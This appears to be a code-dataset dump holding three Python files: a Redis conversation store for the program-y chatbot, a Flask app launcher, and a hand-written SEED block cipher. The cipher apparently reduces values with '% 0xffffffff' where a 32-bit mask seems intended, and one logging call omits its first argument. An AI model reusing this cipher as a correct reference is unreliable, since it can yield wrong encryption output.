code stringlengths 22 1.05M | apis listlengths 1 3.31k | extract_api stringlengths 75 3.25M |
|---|---|---|
"""
Copyright (c) 2016-2018 <NAME> http://www.keithsterling.com
Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated
documentation files (the "Software"), to deal in the Software without restriction, including without limitation
the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software,
and to permit persons to whom the Software is furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all copies or substantial portions of the
Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO
THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT,
TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
"""
import redis
from programy.dialog.storage.base import ConversationStorage
from programy.utils.logging.ylogger import YLogger
class RedisStorage(object):
def __init__(self, config):
self._redis = redis.StrictRedis(
host=config.host,
port=config.port,
password=config.password,
db=0)
def delete(self, key):
self._redis.delete(key)
def save(self, h_key,s_key, clientid, properties):
# Add clientid to sessions set
pipeline = self._redis.pipeline()
pipeline.sadd(s_key, clientid)
# Save properties
pipeline.hmset(h_key, properties)
pipeline.execute()
def is_member(self, s_key, clientid):
# Check if clientid in sessions set
return self._redis.sismember(s_key, clientid)
def get(self, h_key):
return self._redis.hgetall(h_key)
def remove(self, s_key, clientid):
self._redis.srem(s_key, clientid)
class RedisFactory(object):
@staticmethod
def connect(config):
return RedisStorage(config)
class ConversationRedisStorage(ConversationStorage):
def __init__(self, config, factory=None):
ConversationStorage.__init__(self, config)
if factory is None:
self._redis = RedisFactory.connect(config)
else:
self._redis = factory.connect(config)
self._prefix = config.prefix
self._sessions_set_key = "{prefix}:sessions".format( prefix=self._prefix )
# Make sure the client is able to connect to the redis instance
#assert self._redis.echo("test"), "Failed to connect to redis instance"
def empty(self):
YLogger.debug(self, "Deleting Conversation redis data")
try:
self._redis.delete(self._sessions_set_key)
except Exception as e:
YLogger.exception(self, "Failed deleting conversation redis data", e)
def save_conversation(self, conversation, clientid):
YLogger.debug(self, "Saving conversation to Redis for %s"%clientid)
h_key = "{prefix}:{clientid}:props".format(
prefix = self._prefix,
clientid = clientid )
try:
self._redis.save(h_key, self._sessions_set_key, clientid, conversation._properties)
except Exception as e:
YLogger.exception(self, "Failed to save conversation to redis for clientid [%s]"%clientid, e)
def load_conversation(self, conversation, clientid, restore_last_topic=False):
YLogger.debug(self, "Loading Conversation from file for %s"%clientid)
h_key = "{prefix}:{clientid}:props".format(prefix = self._prefix, clientid = clientid)
try:
# Check if clientid in sessions set
if not self._redis.is_member( self._sessions_set_key, clientid ):
return
# Fetch properties
props = self._redis.get(h_key)
last_topic = props["topic"]
# Update conversation
conversation._properties.update(props)
# Load last topic if required
if restore_last_topic and last_topic:
conversation._properties["topic"] = last_topic
except Exception as e:
YLogger.exception(self, "Failed to load conversation from redis for clientid [%s]"%clientid, e)
def remove_conversation(self, clientid):
YLogger.debug("Deleting Conversation redis data")
try:
self._redis.remove(self._sessions_set_key, clientid)
except Exception as e:
YLogger.exception(self, "Failed deleting conversation redis data for clientid [%s]"%clientid, e)
| [
"programy.utils.logging.ylogger.YLogger.exception",
"programy.dialog.storage.base.ConversationStorage.__init__",
"redis.StrictRedis",
"programy.utils.logging.ylogger.YLogger.debug"
] | [((1302, 1392), 'redis.StrictRedis', 'redis.StrictRedis', ([], {'host': 'config.host', 'port': 'config.port', 'password': 'config.password', 'db': '(0)'}), '(host=config.host, port=config.port, password=config.\n password, db=0)\n', (1319, 1392), False, 'import redis\n'), ((2281, 2323), 'programy.dialog.storage.base.ConversationStorage.__init__', 'ConversationStorage.__init__', (['self', 'config'], {}), '(self, config)\n', (2309, 2323), False, 'from programy.dialog.storage.base import ConversationStorage\n'), ((2776, 2831), 'programy.utils.logging.ylogger.YLogger.debug', 'YLogger.debug', (['self', '"""Deleting Conversation redis data"""'], {}), "(self, 'Deleting Conversation redis data')\n", (2789, 2831), False, 'from programy.utils.logging.ylogger import YLogger\n'), ((3082, 3151), 'programy.utils.logging.ylogger.YLogger.debug', 'YLogger.debug', (['self', "('Saving conversation to Redis for %s' % clientid)"], {}), "(self, 'Saving conversation to Redis for %s' % clientid)\n", (3095, 3151), False, 'from programy.utils.logging.ylogger import YLogger\n'), ((3613, 3684), 'programy.utils.logging.ylogger.YLogger.debug', 'YLogger.debug', (['self', "('Loading Conversation from file for %s' % clientid)"], {}), "(self, 'Loading Conversation from file for %s' % clientid)\n", (3626, 3684), False, 'from programy.utils.logging.ylogger import YLogger\n'), ((4494, 4543), 'programy.utils.logging.ylogger.YLogger.debug', 'YLogger.debug', (['"""Deleting Conversation redis data"""'], {}), "('Deleting Conversation redis data')\n", (4507, 4543), False, 'from programy.utils.logging.ylogger import YLogger\n'), ((2945, 3014), 'programy.utils.logging.ylogger.YLogger.exception', 'YLogger.exception', (['self', '"""Failed deleting conversation redis data"""', 'e'], {}), "(self, 'Failed deleting conversation redis data', e)\n", (2962, 3014), False, 'from programy.utils.logging.ylogger import YLogger\n'), ((3426, 3526), 'programy.utils.logging.ylogger.YLogger.exception', 'YLogger.exception', (['self', "('Failed to save conversation to redis for clientid [%s]' % clientid)", 'e'], {}), "(self, \n 'Failed to save conversation to redis for clientid [%s]' % clientid, e)\n", (3443, 3526), False, 'from programy.utils.logging.ylogger import YLogger\n'), ((4343, 4445), 'programy.utils.logging.ylogger.YLogger.exception', 'YLogger.exception', (['self', "('Failed to load conversation from redis for clientid [%s]' % clientid)", 'e'], {}), "(self, \n 'Failed to load conversation from redis for clientid [%s]' % clientid, e)\n", (4360, 4445), False, 'from programy.utils.logging.ylogger import YLogger\n'), ((4667, 4770), 'programy.utils.logging.ylogger.YLogger.exception', 'YLogger.exception', (['self', "('Failed deleting conversation redis data for clientid [%s]' % clientid)", 'e'], {}), "(self, \n 'Failed deleting conversation redis data for clientid [%s]' % clientid, e)\n", (4684, 4770), False, 'from programy.utils.logging.ylogger import YLogger\n')] |
import os
from users import create_app
app = create_app(os.getenv('FLASK_CONFIG') or 'development')
if __name__ == "__main__":
app.run()
| [
"os.getenv"
] | [((57, 82), 'os.getenv', 'os.getenv', (['"""FLASK_CONFIG"""'], {}), "('FLASK_CONFIG')\n", (66, 82), False, 'import os\n')] |
# coding=utf-8
import logging
import struct
SS0 = [
0x2989a1a8, 0x05858184, 0x16c6d2d4, 0x13c3d3d0, 0x14445054, 0x1d0d111c, 0x2c8ca0ac, 0x25052124,
0x1d4d515c, 0x03434340, 0x18081018, 0x1e0e121c, 0x11415150, 0x3cccf0fc, 0x0acac2c8, 0x23436360,
0x28082028, 0x04444044, 0x20002020, 0x1d8d919c, 0x20c0e0e0, 0x22c2e2e0, 0x08c8c0c8, 0x17071314,
0x2585a1a4, 0x0f8f838c, 0x03030300, 0x3b4b7378, 0x3b8bb3b8, 0x13031310, 0x12c2d2d0, 0x2ecee2ec,
0x30407070, 0x0c8c808c, 0x3f0f333c, 0x2888a0a8, 0x32023230, 0x1dcdd1dc, 0x36c6f2f4, 0x34447074,
0x2ccce0ec, 0x15859194, 0x0b0b0308, 0x17475354, 0x1c4c505c, 0x1b4b5358, 0x3d8db1bc, 0x01010100,
0x24042024, 0x1c0c101c, 0x33437370, 0x18889098, 0x10001010, 0x0cccc0cc, 0x32c2f2f0, 0x19c9d1d8,
0x2c0c202c, 0x27c7e3e4, 0x32427270, 0x03838380, 0x1b8b9398, 0x11c1d1d0, 0x06868284, 0x09c9c1c8,
0x20406060, 0x10405050, 0x2383a3a0, 0x2bcbe3e8, 0x0d0d010c, 0x3686b2b4, 0x1e8e929c, 0x0f4f434c,
0x3787b3b4, 0x1a4a5258, 0x06c6c2c4, 0x38487078, 0x2686a2a4, 0x12021210, 0x2f8fa3ac, 0x15c5d1d4,
0x21416160, 0x03c3c3c0, 0x3484b0b4, 0x01414140, 0x12425250, 0x3d4d717c, 0x0d8d818c, 0x08080008,
0x1f0f131c, 0x19899198, 0x00000000, 0x19091118, 0x04040004, 0x13435350, 0x37c7f3f4, 0x21c1e1e0,
0x3dcdf1fc, 0x36467274, 0x2f0f232c, 0x27072324, 0x3080b0b0, 0x0b8b8388, 0x0e0e020c, 0x2b8ba3a8,
0x2282a2a0, 0x2e4e626c, 0x13839390, 0x0d4d414c, 0x29496168, 0x3c4c707c, 0x09090108, 0x0a0a0208,
0x3f8fb3bc, 0x2fcfe3ec, 0x33c3f3f0, 0x05c5c1c4, 0x07878384, 0x14041014, 0x3ecef2fc, 0x24446064,
0x1eced2dc, 0x2e0e222c, 0x0b4b4348, 0x1a0a1218, 0x06060204, 0x21012120, 0x2b4b6368, 0x26466264,
0x02020200, 0x35c5f1f4, 0x12829290, 0x0a8a8288, 0x0c0c000c, 0x3383b3b0, 0x3e4e727c, 0x10c0d0d0,
0x3a4a7278, 0x07474344, 0x16869294, 0x25c5e1e4, 0x26062224, 0x00808080, 0x2d8da1ac, 0x1fcfd3dc,
0x2181a1a0, 0x30003030, 0x37073334, 0x2e8ea2ac, 0x36063234, 0x15051114, 0x22022220, 0x38083038,
0x34c4f0f4, 0x2787a3a4, 0x05454144, 0x0c4c404c, 0x01818180, 0x29c9e1e8, 0x04848084, 0x17879394,
0x35053134, 0x0bcbc3c8, 0x0ecec2cc, 0x3c0c303c, 0x31417170, 0x11011110, 0x07c7c3c4, 0x09898188,
0x35457174, 0x3bcbf3f8, 0x1acad2d8, 0x38c8f0f8, 0x14849094, 0x19495158, 0x02828280, 0x04c4c0c4,
0x3fcff3fc, 0x09494148, 0x39093138, 0x27476364, 0x00c0c0c0, 0x0fcfc3cc, 0x17c7d3d4, 0x3888b0b8,
0x0f0f030c, 0x0e8e828c, 0x02424240, 0x23032320, 0x11819190, 0x2c4c606c, 0x1bcbd3d8, 0x2484a0a4,
0x34043034, 0x31c1f1f0, 0x08484048, 0x02c2c2c0, 0x2f4f636c, 0x3d0d313c, 0x2d0d212c, 0x00404040,
0x3e8eb2bc, 0x3e0e323c, 0x3c8cb0bc, 0x01c1c1c0, 0x2a8aa2a8, 0x3a8ab2b8, 0x0e4e424c, 0x15455154,
0x3b0b3338, 0x1cccd0dc, 0x28486068, 0x3f4f737c, 0x1c8c909c, 0x18c8d0d8, 0x0a4a4248, 0x16465254,
0x37477374, 0x2080a0a0, 0x2dcde1ec, 0x06464244, 0x3585b1b4, 0x2b0b2328, 0x25456164, 0x3acaf2f8,
0x23c3e3e0, 0x3989b1b8, 0x3181b1b0, 0x1f8f939c, 0x1e4e525c, 0x39c9f1f8, 0x26c6e2e4, 0x3282b2b0,
0x31013130, 0x2acae2e8, 0x2d4d616c, 0x1f4f535c, 0x24c4e0e4, 0x30c0f0f0, 0x0dcdc1cc, 0x08888088,
0x16061214, 0x3a0a3238, 0x18485058, 0x14c4d0d4, 0x22426260, 0x29092128, 0x07070304, 0x33033330,
0x28c8e0e8, 0x1b0b1318, 0x05050104, 0x39497178, 0x10809090, 0x2a4a6268, 0x2a0a2228, 0x1a8a9298
]
SS1 = [
0x38380830, 0xe828c8e0, 0x2c2d0d21, 0xa42686a2, 0xcc0fcfc3, 0xdc1eced2, 0xb03383b3, 0xb83888b0,
0xac2f8fa3, 0x60204060, 0x54154551, 0xc407c7c3, 0x44044440, 0x6c2f4f63, 0x682b4b63, 0x581b4b53,
0xc003c3c3, 0x60224262, 0x30330333, 0xb43585b1, 0x28290921, 0xa02080a0, 0xe022c2e2, 0xa42787a3,
0xd013c3d3, 0x90118191, 0x10110111, 0x04060602, 0x1c1c0c10, 0xbc3c8cb0, 0x34360632, 0x480b4b43,
0xec2fcfe3, 0x88088880, 0x6c2c4c60, 0xa82888a0, 0x14170713, 0xc404c4c0, 0x14160612, 0xf434c4f0,
0xc002c2c2, 0x44054541, 0xe021c1e1, 0xd416c6d2, 0x3c3f0f33, 0x3c3d0d31, 0x8c0e8e82, 0x98188890,
0x28280820, 0x4c0e4e42, 0xf436c6f2, 0x3c3e0e32, 0xa42585a1, 0xf839c9f1, 0x0c0d0d01, 0xdc1fcfd3,
0xd818c8d0, 0x282b0b23, 0x64264662, 0x783a4a72, 0x24270723, 0x2c2f0f23, 0xf031c1f1, 0x70324272,
0x40024242, 0xd414c4d0, 0x40014141, 0xc000c0c0, 0x70334373, 0x64274763, 0xac2c8ca0, 0x880b8b83,
0xf437c7f3, 0xac2d8da1, 0x80008080, 0x1c1f0f13, 0xc80acac2, 0x2c2c0c20, 0xa82a8aa2, 0x34340430,
0xd012c2d2, 0x080b0b03, 0xec2ecee2, 0xe829c9e1, 0x5c1d4d51, 0x94148490, 0x18180810, 0xf838c8f0,
0x54174753, 0xac2e8ea2, 0x08080800, 0xc405c5c1, 0x10130313, 0xcc0dcdc1, 0x84068682, 0xb83989b1,
0xfc3fcff3, 0x7c3d4d71, 0xc001c1c1, 0x30310131, 0xf435c5f1, 0x880a8a82, 0x682a4a62, 0xb03181b1,
0xd011c1d1, 0x20200020, 0xd417c7d3, 0x00020202, 0x20220222, 0x04040400, 0x68284860, 0x70314171,
0x04070703, 0xd81bcbd3, 0x9c1d8d91, 0x98198991, 0x60214161, 0xbc3e8eb2, 0xe426c6e2, 0x58194951,
0xdc1dcdd1, 0x50114151, 0x90108090, 0xdc1cccd0, 0x981a8a92, 0xa02383a3, 0xa82b8ba3, 0xd010c0d0,
0x80018181, 0x0c0f0f03, 0x44074743, 0x181a0a12, 0xe023c3e3, 0xec2ccce0, 0x8c0d8d81, 0xbc3f8fb3,
0x94168692, 0x783b4b73, 0x5c1c4c50, 0xa02282a2, 0xa02181a1, 0x60234363, 0x20230323, 0x4c0d4d41,
0xc808c8c0, 0x9c1e8e92, 0x9c1c8c90, 0x383a0a32, 0x0c0c0c00, 0x2c2e0e22, 0xb83a8ab2, 0x6c2e4e62,
0x9c1f8f93, 0x581a4a52, 0xf032c2f2, 0x90128292, 0xf033c3f3, 0x48094941, 0x78384870, 0xcc0cccc0,
0x14150511, 0xf83bcbf3, 0x70304070, 0x74354571, 0x7c3f4f73, 0x34350531, 0x10100010, 0x00030303,
0x64244460, 0x6c2d4d61, 0xc406c6c2, 0x74344470, 0xd415c5d1, 0xb43484b0, 0xe82acae2, 0x08090901,
0x74364672, 0x18190911, 0xfc3ecef2, 0x40004040, 0x10120212, 0xe020c0e0, 0xbc3d8db1, 0x04050501,
0xf83acaf2, 0x00010101, 0xf030c0f0, 0x282a0a22, 0x5c1e4e52, 0xa82989a1, 0x54164652, 0x40034343,
0x84058581, 0x14140410, 0x88098981, 0x981b8b93, 0xb03080b0, 0xe425c5e1, 0x48084840, 0x78394971,
0x94178793, 0xfc3cccf0, 0x1c1e0e12, 0x80028282, 0x20210121, 0x8c0c8c80, 0x181b0b13, 0x5c1f4f53,
0x74374773, 0x54144450, 0xb03282b2, 0x1c1d0d11, 0x24250521, 0x4c0f4f43, 0x00000000, 0x44064642,
0xec2dcde1, 0x58184850, 0x50124252, 0xe82bcbe3, 0x7c3e4e72, 0xd81acad2, 0xc809c9c1, 0xfc3dcdf1,
0x30300030, 0x94158591, 0x64254561, 0x3c3c0c30, 0xb43686b2, 0xe424c4e0, 0xb83b8bb3, 0x7c3c4c70,
0x0c0e0e02, 0x50104050, 0x38390931, 0x24260622, 0x30320232, 0x84048480, 0x68294961, 0x90138393,
0x34370733, 0xe427c7e3, 0x24240420, 0xa42484a0, 0xc80bcbc3, 0x50134353, 0x080a0a02, 0x84078783,
0xd819c9d1, 0x4c0c4c40, 0x80038383, 0x8c0f8f83, 0xcc0ecec2, 0x383b0b33, 0x480a4a42, 0xb43787b3
]
SS2 = [
0xa1a82989, 0x81840585, 0xd2d416c6, 0xd3d013c3, 0x50541444, 0x111c1d0d, 0xa0ac2c8c, 0x21242505,
0x515c1d4d, 0x43400343, 0x10181808, 0x121c1e0e, 0x51501141, 0xf0fc3ccc, 0xc2c80aca, 0x63602343,
0x20282808, 0x40440444, 0x20202000, 0x919c1d8d, 0xe0e020c0, 0xe2e022c2, 0xc0c808c8, 0x13141707,
0xa1a42585, 0x838c0f8f, 0x03000303, 0x73783b4b, 0xb3b83b8b, 0x13101303, 0xd2d012c2, 0xe2ec2ece,
0x70703040, 0x808c0c8c, 0x333c3f0f, 0xa0a82888, 0x32303202, 0xd1dc1dcd, 0xf2f436c6, 0x70743444,
0xe0ec2ccc, 0x91941585, 0x03080b0b, 0x53541747, 0x505c1c4c, 0x53581b4b, 0xb1bc3d8d, 0x01000101,
0x20242404, 0x101c1c0c, 0x73703343, 0x90981888, 0x10101000, 0xc0cc0ccc, 0xf2f032c2, 0xd1d819c9,
0x202c2c0c, 0xe3e427c7, 0x72703242, 0x83800383, 0x93981b8b, 0xd1d011c1, 0x82840686, 0xc1c809c9,
0x60602040, 0x50501040, 0xa3a02383, 0xe3e82bcb, 0x010c0d0d, 0xb2b43686, 0x929c1e8e, 0x434c0f4f,
0xb3b43787, 0x52581a4a, 0xc2c406c6, 0x70783848, 0xa2a42686, 0x12101202, 0xa3ac2f8f, 0xd1d415c5,
0x61602141, 0xc3c003c3, 0xb0b43484, 0x41400141, 0x52501242, 0x717c3d4d, 0x818c0d8d, 0x00080808,
0x131c1f0f, 0x91981989, 0x00000000, 0x11181909, 0x00040404, 0x53501343, 0xf3f437c7, 0xe1e021c1,
0xf1fc3dcd, 0x72743646, 0x232c2f0f, 0x23242707, 0xb0b03080, 0x83880b8b, 0x020c0e0e, 0xa3a82b8b,
0xa2a02282, 0x626c2e4e, 0x93901383, 0x414c0d4d, 0x61682949, 0x707c3c4c, 0x01080909, 0x02080a0a,
0xb3bc3f8f, 0xe3ec2fcf, 0xf3f033c3, 0xc1c405c5, 0x83840787, 0x10141404, 0xf2fc3ece, 0x60642444,
0xd2dc1ece, 0x222c2e0e, 0x43480b4b, 0x12181a0a, 0x02040606, 0x21202101, 0x63682b4b, 0x62642646,
0x02000202, 0xf1f435c5, 0x92901282, 0x82880a8a, 0x000c0c0c, 0xb3b03383, 0x727c3e4e, 0xd0d010c0,
0x72783a4a, 0x43440747, 0x92941686, 0xe1e425c5, 0x22242606, 0x80800080, 0xa1ac2d8d, 0xd3dc1fcf,
0xa1a02181, 0x30303000, 0x33343707, 0xa2ac2e8e, 0x32343606, 0x11141505, 0x22202202, 0x30383808,
0xf0f434c4, 0xa3a42787, 0x41440545, 0x404c0c4c, 0x81800181, 0xe1e829c9, 0x80840484, 0x93941787,
0x31343505, 0xc3c80bcb, 0xc2cc0ece, 0x303c3c0c, 0x71703141, 0x11101101, 0xc3c407c7, 0x81880989,
0x71743545, 0xf3f83bcb, 0xd2d81aca, 0xf0f838c8, 0x90941484, 0x51581949, 0x82800282, 0xc0c404c4,
0xf3fc3fcf, 0x41480949, 0x31383909, 0x63642747, 0xc0c000c0, 0xc3cc0fcf, 0xd3d417c7, 0xb0b83888,
0x030c0f0f, 0x828c0e8e, 0x42400242, 0x23202303, 0x91901181, 0x606c2c4c, 0xd3d81bcb, 0xa0a42484,
0x30343404, 0xf1f031c1, 0x40480848, 0xc2c002c2, 0x636c2f4f, 0x313c3d0d, 0x212c2d0d, 0x40400040,
0xb2bc3e8e, 0x323c3e0e, 0xb0bc3c8c, 0xc1c001c1, 0xa2a82a8a, 0xb2b83a8a, 0x424c0e4e, 0x51541545,
0x33383b0b, 0xd0dc1ccc, 0x60682848, 0x737c3f4f, 0x909c1c8c, 0xd0d818c8, 0x42480a4a, 0x52541646,
0x73743747, 0xa0a02080, 0xe1ec2dcd, 0x42440646, 0xb1b43585, 0x23282b0b, 0x61642545, 0xf2f83aca,
0xe3e023c3, 0xb1b83989, 0xb1b03181, 0x939c1f8f, 0x525c1e4e, 0xf1f839c9, 0xe2e426c6, 0xb2b03282,
0x31303101, 0xe2e82aca, 0x616c2d4d, 0x535c1f4f, 0xe0e424c4, 0xf0f030c0, 0xc1cc0dcd, 0x80880888,
0x12141606, 0x32383a0a, 0x50581848, 0xd0d414c4, 0x62602242, 0x21282909, 0x03040707, 0x33303303,
0xe0e828c8, 0x13181b0b, 0x01040505, 0x71783949, 0x90901080, 0x62682a4a, 0x22282a0a, 0x92981a8a
]
SS3 = [
0x08303838, 0xc8e0e828, 0x0d212c2d, 0x86a2a426, 0xcfc3cc0f, 0xced2dc1e, 0x83b3b033, 0x88b0b838,
0x8fa3ac2f, 0x40606020, 0x45515415, 0xc7c3c407, 0x44404404, 0x4f636c2f, 0x4b63682b, 0x4b53581b,
0xc3c3c003, 0x42626022, 0x03333033, 0x85b1b435, 0x09212829, 0x80a0a020, 0xc2e2e022, 0x87a3a427,
0xc3d3d013, 0x81919011, 0x01111011, 0x06020406, 0x0c101c1c, 0x8cb0bc3c, 0x06323436, 0x4b43480b,
0xcfe3ec2f, 0x88808808, 0x4c606c2c, 0x88a0a828, 0x07131417, 0xc4c0c404, 0x06121416, 0xc4f0f434,
0xc2c2c002, 0x45414405, 0xc1e1e021, 0xc6d2d416, 0x0f333c3f, 0x0d313c3d, 0x8e828c0e, 0x88909818,
0x08202828, 0x4e424c0e, 0xc6f2f436, 0x0e323c3e, 0x85a1a425, 0xc9f1f839, 0x0d010c0d, 0xcfd3dc1f,
0xc8d0d818, 0x0b23282b, 0x46626426, 0x4a72783a, 0x07232427, 0x0f232c2f, 0xc1f1f031, 0x42727032,
0x42424002, 0xc4d0d414, 0x41414001, 0xc0c0c000, 0x43737033, 0x47636427, 0x8ca0ac2c, 0x8b83880b,
0xc7f3f437, 0x8da1ac2d, 0x80808000, 0x0f131c1f, 0xcac2c80a, 0x0c202c2c, 0x8aa2a82a, 0x04303434,
0xc2d2d012, 0x0b03080b, 0xcee2ec2e, 0xc9e1e829, 0x4d515c1d, 0x84909414, 0x08101818, 0xc8f0f838,
0x47535417, 0x8ea2ac2e, 0x08000808, 0xc5c1c405, 0x03131013, 0xcdc1cc0d, 0x86828406, 0x89b1b839,
0xcff3fc3f, 0x4d717c3d, 0xc1c1c001, 0x01313031, 0xc5f1f435, 0x8a82880a, 0x4a62682a, 0x81b1b031,
0xc1d1d011, 0x00202020, 0xc7d3d417, 0x02020002, 0x02222022, 0x04000404, 0x48606828, 0x41717031,
0x07030407, 0xcbd3d81b, 0x8d919c1d, 0x89919819, 0x41616021, 0x8eb2bc3e, 0xc6e2e426, 0x49515819,
0xcdd1dc1d, 0x41515011, 0x80909010, 0xccd0dc1c, 0x8a92981a, 0x83a3a023, 0x8ba3a82b, 0xc0d0d010,
0x81818001, 0x0f030c0f, 0x47434407, 0x0a12181a, 0xc3e3e023, 0xcce0ec2c, 0x8d818c0d, 0x8fb3bc3f,
0x86929416, 0x4b73783b, 0x4c505c1c, 0x82a2a022, 0x81a1a021, 0x43636023, 0x03232023, 0x4d414c0d,
0xc8c0c808, 0x8e929c1e, 0x8c909c1c, 0x0a32383a, 0x0c000c0c, 0x0e222c2e, 0x8ab2b83a, 0x4e626c2e,
0x8f939c1f, 0x4a52581a, 0xc2f2f032, 0x82929012, 0xc3f3f033, 0x49414809, 0x48707838, 0xccc0cc0c,
0x05111415, 0xcbf3f83b, 0x40707030, 0x45717435, 0x4f737c3f, 0x05313435, 0x00101010, 0x03030003,
0x44606424, 0x4d616c2d, 0xc6c2c406, 0x44707434, 0xc5d1d415, 0x84b0b434, 0xcae2e82a, 0x09010809,
0x46727436, 0x09111819, 0xcef2fc3e, 0x40404000, 0x02121012, 0xc0e0e020, 0x8db1bc3d, 0x05010405,
0xcaf2f83a, 0x01010001, 0xc0f0f030, 0x0a22282a, 0x4e525c1e, 0x89a1a829, 0x46525416, 0x43434003,
0x85818405, 0x04101414, 0x89818809, 0x8b93981b, 0x80b0b030, 0xc5e1e425, 0x48404808, 0x49717839,
0x87939417, 0xccf0fc3c, 0x0e121c1e, 0x82828002, 0x01212021, 0x8c808c0c, 0x0b13181b, 0x4f535c1f,
0x47737437, 0x44505414, 0x82b2b032, 0x0d111c1d, 0x05212425, 0x4f434c0f, 0x00000000, 0x46424406,
0xcde1ec2d, 0x48505818, 0x42525012, 0xcbe3e82b, 0x4e727c3e, 0xcad2d81a, 0xc9c1c809, 0xcdf1fc3d,
0x00303030, 0x85919415, 0x45616425, 0x0c303c3c, 0x86b2b436, 0xc4e0e424, 0x8bb3b83b, 0x4c707c3c,
0x0e020c0e, 0x40505010, 0x09313839, 0x06222426, 0x02323032, 0x84808404, 0x49616829, 0x83939013,
0x07333437, 0xc7e3e427, 0x04202424, 0x84a0a424, 0xcbc3c80b, 0x43535013, 0x0a02080a, 0x87838407,
0xc9d1d819, 0x4c404c0c, 0x83838003, 0x8f838c0f, 0xcec2cc0e, 0x0b33383b, 0x4a42480a, 0x87b3b437
]
KC = [
0x9e3779b9, 0x3c6ef373, 0x78dde6e6, 0xf1bbcdcc,
0xe3779b99, 0xc6ef3733, 0x8dde6e67, 0x1bbcdccf,
0x3779b99e, 0x6ef3733c, 0xdde6e678, 0xbbcdccf1,
0x779b99e3, 0xef3733c6, 0xde6e678d, 0xbcdccf1b
]
BLOCK_SIZE = 16
def long_to_bytes(dest: bytearray, dest_off: int, value: int) -> None:
dest[dest_off:dest_off + 8] = struct.pack('>Q', value)
def g(x: int) -> int:
g_val = SS0[x & 0xff] ^ SS1[(x >> 8) & 0xff] ^ SS2[(x >> 16) & 0xff] ^ SS3[(x >> 24) & 0xff]
return g_val % 0xffffffff
def F(ki0: int, ki1: int, r: int) -> int:
r0 = (r >> 32) % (2 ** 32)
r1 = r % (2 ** 32)
rd1 = phase_calc2(r0, ki0, r1, ki1)
rd0 = rd1 + phase_calc1(r0, ki0, r1, ki1)
return ((rd0 << 32) | (rd1 & 0xffffffff)) & 0xffffffffffffffff
def phase_calc1(r0: int, ki0: int, r1: int, ki1: int) -> int:
return g(g((r0 ^ ki0) ^ (r1 ^ ki1)) + (r0 ^ ki0)) % 0xffffffff
def phase_calc2(r0: int, ki0: int, r1: int, ki1: int) -> int:
return g(phase_calc1(r0, ki0, r1, ki1) + g((r0 ^ ki0) ^ (r1 ^ ki1))) % 0xffffffff
def process_block(enc: bool, raw_key: bytes, in_data: bytes) -> bytearray:
if raw_key is None:
raise ValueError('raw_key required')
w_key = set_key(raw_key)
if len(in_data) != BLOCK_SIZE:
raise ValueError('wrong size')
out = bytearray(BLOCK_SIZE)
left = bytes_to_long(in_data, 0)
right = bytes_to_long(in_data, 8)
logging.debug(f'left = ({len(hex(left)) - 2}){hex(left)}, right = ({len(hex(right)) - 2}){hex(right)}')
logging.debug(
f'round(i) = -1, left = ({len(hex(left)) - 2}){hex(left)}, right = ({len(hex(right)) - 2}){hex(right)}')
if enc:
loop = range(16) # 0 -> 15 for encryption
else:
loop = range(15, -1, -1) # 15 -> 0 for decryption
for i in loop:
nl = right
k1 = struct.unpack('>I', w_key[4 * (2 * i):4 * (2 * i) + 4])[0]
k2 = struct.unpack('>I', w_key[4 * (2 * i + 1):4 * (2 * i + 1) + 4])[0]
rk = F(k1, k2, right)
right = left ^ rk
left = nl
long_to_bytes(out, 0, right)
long_to_bytes(out, 8, left)
return out
def extract_w0(val: int) -> int:
return val >> 32
def extract_w1(val: int) -> int:
return val % (2 ** 32)
def bytes_to_long(src: bytes, offset: int) -> int:
return struct.unpack('>Q', src[offset:offset + 8])[0]
def rotate_right8(x: int) -> int:
return ((x >> 8) ^ (x << 56)) % (2 ** 64)
def rotate_left8(x: int) -> int:
return ((x << 8) ^ (x >> 56)) % (2 ** 64)
def set_key(raw_key: bytes) -> bytearray:
logging.debug(f'raw_key = {raw_key.hex()}')
key: bytearray = bytearray(16 * 8)
l_lower = bytes_to_long(raw_key, 0)
l_upper = bytes_to_long(raw_key, 8)
key0 = extract_w0(l_lower)
key1 = extract_w1(l_lower)
key2 = extract_w0(l_upper)
key3 = extract_w1(l_upper)
for i in range(16):
t0 = key0 + key2 - KC[i]
t1 = key1 - key3 + KC[i]
ch1 = struct.pack('>I', g(t0))
key[4 * (2 * i):4 * (2 * i) + 4] = ch1
ch2 = struct.pack('>I', g(t1))
key[4 * (2 * i + 1):4 * (2 * i + 1) + 4] = ch2
logging.debug(f'key0-4 {key0:#010x}, {key1:#010x}, {key2:#010x}, {key3:#010x} set key rount {i:02d} ='
f' {ch1.hex()} - {ch2.hex()} lower = {l_lower:#018x} upper = {l_upper:#018x}')
if i % 2 == 0:
l_lower = rotate_right8(l_lower)
key0 = extract_w0(l_lower)
key1 = extract_w1(l_lower)
else:
l_upper = rotate_left8(l_upper)
key2 = extract_w0(l_upper)
key3 = extract_w1(l_upper)
return key
| [
"struct.unpack",
"struct.pack"
] | [((13228, 13252), 'struct.pack', 'struct.pack', (['""">Q"""', 'value'], {}), "('>Q', value)\n", (13239, 13252), False, 'import struct\n'), ((15199, 15242), 'struct.unpack', 'struct.unpack', (['""">Q"""', 'src[offset:offset + 8]'], {}), "('>Q', src[offset:offset + 8])\n", (15212, 15242), False, 'import struct\n'), ((14722, 14777), 'struct.unpack', 'struct.unpack', (['""">I"""', 'w_key[4 * (2 * i):4 * (2 * i) + 4]'], {}), "('>I', w_key[4 * (2 * i):4 * (2 * i) + 4])\n", (14735, 14777), False, 'import struct\n'), ((14794, 14857), 'struct.unpack', 'struct.unpack', (['""">I"""', 'w_key[4 * (2 * i + 1):4 * (2 * i + 1) + 4]'], {}), "('>I', w_key[4 * (2 * i + 1):4 * (2 * i + 1) + 4])\n", (14807, 14857), False, 'import struct\n')] |
#!/usr/bin/env python
#
